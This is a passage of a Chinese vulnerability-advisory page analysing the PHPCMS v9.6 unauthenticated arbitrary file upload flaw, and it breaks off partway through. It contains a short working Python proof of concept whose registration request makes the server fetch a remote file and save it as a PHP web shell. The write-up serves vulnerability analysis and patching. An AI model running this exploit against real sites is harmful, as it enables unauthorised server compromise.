PHPCMS 注册页面任意文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

**Author: p0wd3r (知道创宇404安全实验室)** **Date: 2017-04-12** ## 0x00 漏洞概述 ### 漏洞简介 前几天 phpcms v9.6 的任意文件上传的漏洞引起了安全圈热议,通过该漏洞攻击者可以在未授权的情况下任意文件上传,影响不容小觑。phpcms官方今天发布了9.6.1版本,对漏洞进行了补丁修复. ### 漏洞影响 任意文件上传 ## 0x01 漏洞复现 本文从 PoC 的角度出发,逆向的还原漏洞过程,若有哪些错误的地方,还望大家多多指教。 首先我们看简化的 PoC : ```python import re import requests def poc(url): u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url) data = { 'siteid': '1', 'modelid': '1', 'username': 'test', 'password': 'testxx', 'email': 'test@test.com', 'info[content]': '<img src=http://url/shell.txt?.php#.jpg>', 'dosubmit': '1', } rep = requests.post(u, data=data) shell = '' re_result = re.findall(r'&lt;img src=(.*)&gt', rep.content) if len(re_result): shell = re_result[0] print shell ``` 可以看到 PoC 是发起注册请求,对应的是`phpcms/modules/member/index.php`中的`register`函数,所以我们在那里下断点,接着使用 PoC 并开启动态调试,在获取一些信息之后,函数走到了如下位置: ![/register_func.png](https://images.seebug.org/content/images/2017/04/pic/register_func.png) 通过 PoC 不难看出我们的 payload...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息